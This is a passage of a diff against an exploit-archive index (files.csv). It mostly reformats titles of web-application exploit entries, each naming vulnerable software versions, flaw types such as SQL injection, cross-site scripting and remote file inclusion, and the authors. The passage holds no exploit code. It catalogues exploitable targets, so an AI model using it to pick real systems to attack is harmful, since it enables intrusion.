PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,php,webapps,0 31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 -31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp dir' Parameter Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp?dir' Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 -31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 +31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - 'create_forum.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - 'create_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 @@ -32519,12 +32520,12 @@ id,file,description,date,author,platform,type,port 31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 - 'reorder_forums.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80 31459,platforms/php/webapps/31459.txt,"Joomla! 3.2.1 - SQL Injection",2014-02-06,killall-9,php,webapps,80 -31469,platforms/php/webapps/31469.txt,"ooComments 1.0 - classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 -31470,platforms/php/webapps/31470.txt,"ooComments 1.0 - classes/class_comments.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 +31469,platforms/php/webapps/31469.txt,"ooComments 1.0 - 'classes/class_admin.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 +31470,platforms/php/webapps/31470.txt,"ooComments 1.0 - 'classes/class_comments.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 31471,platforms/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 - 'index.php' Cross-Site Scripting",2008-03-22,Y433r,php,webapps,0 31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 - 'manpage.html' Cross-Site Scripting",2008-03-22,Linux_Drox,php,webapps,0 31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCMS 7.0.3 - 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0 -31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor - 'id' Parameter SQL Injection",2008-03-24,RMx,php,webapps,0 +31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor - 'id' SQL Injection",2008-03-24,RMx,php,webapps,0 31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 - locate.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 - search_results.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 - Classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 @@ -32560,7 +32561,7 @@ id,file,description,date,author,platform,type,port 31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 - include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php zID' Parameter SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 +31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php?zID' SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - (Backend) Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",php,webapps,80 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 @@ -32572,55 +32573,55 @@ id,file,description,date,author,platform,type,port 31538,platforms/cgi/webapps/31538.txt,"BlackBoard Academic Suite 6/7 - bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 31539,platforms/php/webapps/31539.txt,"PHPAddressBook 2.0 - 'index.php' SQL Injection",2008-03-26,"Virangar Security",php,webapps,0 31541,platforms/php/webapps/31541.html,"Invision Power Board 2.x - 'Signature' iFrame Security",2008-03-26,SHAHEE_MIRZA,php,webapps,0 -31543,platforms/php/webapps/31543.txt,"GeeCarts - show.php id Parameter Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps,0 -31544,platforms/php/webapps/31544.txt,"GeeCarts - search.php id Parameter Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps,0 -31545,platforms/php/webapps/31545.txt,"GeeCarts - view.php id Parameter Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps,0 -31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 - lookup_result.asp domain Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0 -31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0 +31543,platforms/php/webapps/31543.txt,"GeeCarts - 'show.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps,0 +31544,platforms/php/webapps/31544.txt,"GeeCarts - 'search.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps,0 +31545,platforms/php/webapps/31545.txt,"GeeCarts - 'view.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps,0 +31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 - 'lookup_result.asp?domain' Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0 +31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - 'suggest_result.asp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-27,Linux_Drox,asp,webapps,0 31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0 -31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0 -31555,platforms/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusion",2008-03-28,Sibertrwolf,php,webapps,0 +31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusions",2008-03-27,XxX,php,webapps,0 +31555,platforms/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusions",2008-03-28,Sibertrwolf,php,webapps,0 40770,platforms/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,php,webapps,0 40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 -31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 +31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - 'setup.php?language_setup' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31566,platforms/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - 'index.php' test Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Route) - Cross-Site Request Forgery",2014-02-11,killall-9,hardware,webapps,80 31570,platforms/php/webapps/31570.txt,"WordPress Plugin Frontend Upload - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 31571,platforms/php/webapps/31571.txt,"WordPress Plugin BuddyPress 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 -32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - (rmdp) 1.5/1.7 Module for XOOPS search.php key Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus - (rmdp) 1.5/1.7 Module for XOOPS down.php id Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - '(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus - '(rmdp) 1.5/1.7 Module for XOOPS down.php?id' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0 31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_Guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31581,platforms/php/webapps/31581.txt,"PHPGKit 0.9 - 'connexion.php' Remote File Inclusion",2008-03-31,ZoRLu,php,webapps,0 -31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 - 'catID' Parameter SQL Injection",2008-03-31,RMx,asp,webapps,0 +31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 - 'catID' SQL Injection",2008-03-31,RMx,asp,webapps,0 31584,platforms/php/webapps/31584.txt,"Terracotta - 'index.php' Local File Inclusion",2008-04-01,"Joseph Giron",php,webapps,0 31587,platforms/php/webapps/31587.txt,"EasySite 2.0 - 'browser.php' Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 31588,platforms/php/webapps/31588.txt,"EasySite 2.0 - 'image_editor.php' Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 31589,platforms/php/webapps/31589.txt,"EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 31590,platforms/php/webapps/31590.txt,"DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps,0 -31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component Showroom Joomlearn LMS - 'cat' Parameter SQL Injection",2008-04-03,The-0utl4w,php,webapps,0 -31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 - admin.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 +31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component Showroom Joomlearn LMS - 'cat' SQL Injection",2008-04-03,The-0utl4w,php,webapps,0 +31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 - 'admin.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 - 'index.php' lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 -31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 - sess.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 -31599,platforms/php/webapps/31599.txt,"mcGallery 1.1 - stats.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 -31600,platforms/php/webapps/31600.txt,"mcGallery 1.1 - detail.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 -31601,platforms/php/webapps/31601.txt,"mcGallery 1.1 - resize.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 -31602,platforms/php/webapps/31602.txt,"mcGallery 1.1 - show.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 +31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 - 'sess.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 +31599,platforms/php/webapps/31599.txt,"mcGallery 1.1 - 'stats.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 +31600,platforms/php/webapps/31600.txt,"mcGallery 1.1 - 'detail.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 +31601,platforms/php/webapps/31601.txt,"mcGallery 1.1 - 'resize.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 +31602,platforms/php/webapps/31602.txt,"mcGallery 1.1 - 'show.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 31603,platforms/php/webapps/31603.html,"Parallels Virtuozzo Containers 3.0.0-25.4/4.0.0-365.6 VZPP Interface File Manger - Cross-Site Request Forgery",2008-04-03,poplix,php,webapps,0 31604,platforms/php/webapps/31604.html,"Parallels Virtuozzo Containers 3.0.0-25.4.swsoft VZPP Interface Change Pass - Cross-Site Request Forgery",2008-04-03,poplix,php,webapps,0 31605,platforms/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 - Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,php,webapps,0 31606,platforms/php/webapps/31606.txt,"Glossaire 2.0 - 'glossaire.php' Cross-Site Scripting",2008-04-04,ZoRLu,php,webapps,0 -31608,platforms/php/webapps/31608.txt,"KwsPHP 1.0 ConcoursPhoto Module - 'VIEW' Parameter Cross-Site Scripting",2008-04-04,"H-T Team",php,webapps,0 -31609,platforms/php/webapps/31609.txt,"Nuke ET 3.4 - 'mensaje' Parameter HTML Injection",2008-04-04,"Jose Luis Zayas",php,webapps,0 -31610,platforms/php/webapps/31610.txt,"RobotStats 0.1 - graph.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 -31611,platforms/php/webapps/31611.txt,"RobotStats 0.1 - robotstats.inc.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 +31608,platforms/php/webapps/31608.txt,"KwsPHP 1.0 ConcoursPhoto Module - 'VIEW' Cross-Site Scripting",2008-04-04,"H-T Team",php,webapps,0 +31609,platforms/php/webapps/31609.txt,"Nuke ET 3.4 - 'mensaje' HTML Injection",2008-04-04,"Jose Luis Zayas",php,webapps,0 +31610,platforms/php/webapps/31610.txt,"RobotStats 0.1 - 'graph.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 +31611,platforms/php/webapps/31611.txt,"RobotStats 0.1 - 'robotstats.inc.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,php,webapps,0 -31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 +31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 31617,platforms/hardware/webapps/31617.txt,"NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0 31618,platforms/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,ios,webapps,0 31621,platforms/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting",2008-04-07,syniack,java,webapps,0 @@ -32629,42 +32630,42 @@ id,file,description,date,author,platform,type,port 31625,platforms/php/webapps/31625.txt,"Prozilla Gaming Directory 1.0 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 31626,platforms/php/webapps/31626.txt,"Prozilla Software Index 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 31628,platforms/php/webapps/31628.txt,"Swiki 1.5 - HTML Injection / Cross-Site Scripting",2008-04-08,"Brad Antoniewicz",php,webapps,0 -31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade 2.2 - 'gid' Parameter SQL Injection",2008-04-09,MantiS,php,webapps,0 +31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade 2.2 - 'gid' SQL Injection",2008-04-09,MantiS,php,webapps,0 31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 31636,platforms/php/webapps/31636.txt,"W2B PHPHotResources - 'cat.php' SQL Injection",2008-04-11,The-0utl4w,php,webapps,0 31637,platforms/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection",2008-04-11,The-0utl4w,php,webapps,0 31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection",2008-04-13,S@BUN,php,webapps,0 -31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting",2008-04-14,"Sebastien gioria",java,webapps,0 -31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - cflookup.asp Multiple Parameter Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31645,platforms/asp/webapps/31645.txt,"Cezanne 6.5.1/7 - CznCustomContainer.asp Multiple Parameter Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31646,platforms/asp/webapps/31646.txt,"Cezanne 6.5.1/7 - home.asp CFTARGET Parameter Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Cross-Site Scripting",2008-04-14,"Sebastien gioria",java,webapps,0 +31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - 'cflookup.asp' Multiple Cross-Site Scripting Vulnerabilities",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31645,platforms/asp/webapps/31645.txt,"Cezanne 6.5.1/7 - 'CznCustomContainer.asp' Multiple Cross-Site Scripting Vulnerabilities",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31646,platforms/asp/webapps/31646.txt,"Cezanne 6.5.1/7 - 'home.asp?CFTARGET' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31647,platforms/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",multiple,webapps,0 -31648,platforms/asp/webapps/31648.txt,"Cezanne 7 - cflookup.asp FUNID Parameter SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31649,platforms/asp/webapps/31649.txt,"Cezanne 7 - CznCommon/CznCustomContainer.asp FUNID Parameter SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31648,platforms/asp/webapps/31648.txt,"Cezanne 7 - 'cflookup.asp?FUNID' SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31649,platforms/asp/webapps/31649.txt,"Cezanne 7 - 'CznCommon/CznCustomContainer.asp?FUNID' SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31650,platforms/asp/webapps/31650.txt,"Cezanne Software 6.5.1/7 - 'CFLogon.asp' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31651,platforms/php/webapps/31651.txt,"amfPHP 1.2 - browser/methodTable.php class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 -31652,platforms/php/webapps/31652.txt,"amfPHP 1.2 - browser/code.php Multiple Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 +31651,platforms/php/webapps/31651.txt,"amfPHP 1.2 - 'browser/methodTable.php?class' Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 +31652,platforms/php/webapps/31652.txt,"amfPHP 1.2 - 'browser/code.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31653,platforms/php/webapps/31653.txt,"amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 -31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Parameter Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0 +31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0 31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps,0 31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31659,platforms/php/webapps/31659.txt,"PHP-Stats 0.1.9.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps,0 -31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 - add_groupe.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 -31661,platforms/php/webapps/31661.txt,"EsContacts 1.0 - contacts.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 -31662,platforms/php/webapps/31662.txt,"EsContacts 1.0 - groupes.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 -31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 - importer.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 +31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 - 'add_groupe.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 +31661,platforms/php/webapps/31661.txt,"EsContacts 1.0 - 'contacts.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 +31662,platforms/php/webapps/31662.txt,"EsContacts 1.0 - 'groupes.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 +31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 - 'importer.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 -31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - search.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 +31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - 'search.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31666,platforms/asp/webapps/31666.txt,"Cobalt 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0 31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,php,webapps,0 -31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 -31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 +31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 +31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 - admin.php Cross-Site Request Forgery (Add Admin)",2008-04-18,"Michael Brooks",php,webapps,0 31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,php,webapps,0 31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,multiple,webapps,0 31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0 31676,platforms/php/webapps/31676.txt,"Host Directory PRO - Cookie Security Bypass",2008-04-20,Crackers_Child,php,webapps,0 -31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 - 'beg' Parameter Cross-Site Scripting",2008-04-21,ZoRLu,php,webapps,0 +31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 - 'beg' Cross-Site Scripting",2008-04-21,ZoRLu,php,webapps,0 31678,platforms/php/webapps/31678.txt,"SMF 1.1.4 - Audio CAPTCHA Security Bypass",2008-04-21,"Michael Brooks",php,webapps,0 31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 - 'mod_search' Remote File Inclusion",2008-04-21,ZoRLu,php,webapps,0 31714,platforms/php/webapps/31714.txt,"C-News 1.0.1 - 'install.php' Cross-Site Scripting",2008-04-30,ZoRLu,php,webapps,0 @@ -32677,43 +32678,43 @@ id,file,description,date,author,platform,type,port 31693,platforms/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31702,platforms/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module - Arbitrary File Upload",2008-04-24,ZoRLu,php,webapps,0 31703,platforms/php/webapps/31703.txt,"Pixel Motion Blog - 'list_article.php' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 -31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 - admin/index.php hash Parameter SQL Injection",2008-04-24,ZoRLu,php,webapps,0 -31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 - upload/install/index.php step Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 +31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 - 'admin/index.php?hash' SQL Injection",2008-04-24,ZoRLu,php,webapps,0 +31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 - 'upload/install/index.php?step' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 31708,platforms/php/webapps/31708.txt,"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion",2008-04-26,NoGe,php,webapps,0 -31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Parameter Cross-Site Scripting / Local File Inclusion",2008-04-26,"Khashayar Fereidani",php,webapps,0 +31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Cross-Site Scripting / Local File Inclusion",2008-04-26,"Khashayar Fereidani",php,webapps,0 31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0 31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0 31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 -31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - footer.php Multiple Parameter Cross-Site 